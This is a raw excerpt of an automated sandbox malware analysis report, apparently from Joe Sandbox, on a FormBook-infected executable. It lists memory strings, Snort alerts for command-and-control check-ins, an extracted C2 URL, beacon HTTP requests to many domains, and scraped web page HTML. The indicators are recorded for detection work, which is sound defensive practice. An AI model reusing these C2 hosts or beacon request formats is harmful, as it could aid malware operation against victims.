          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.hnchotels.com/mb7q/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.belatopapparel.xyz
          Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1Host: www.pradnyanamaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.hepimizdostuz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1Host: www.hnchotels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.bookitstaugustine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1Host: www.beyju.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1Host: www.accessibleageing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.theskineditco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.thelandcle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1Host: www.tuyensinhhaiphong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.merkuryindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1Host: www.belatopapparel.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.helpmewithmyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1Host: www.softballlyfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 172.67.150.212 172.67.150.212
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1Host: www.pradnyanamaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.hepimizdostuz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1Host: www.hnchotels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.bookitstaugustine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1Host: www.beyju.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1Host: www.accessibleageing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.theskineditco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.thelandcle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1Host: www.tuyensinhhaiphong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.merkuryindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1Host: www.belatopapparel.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.helpmewithmyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1Host: www.softballlyfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
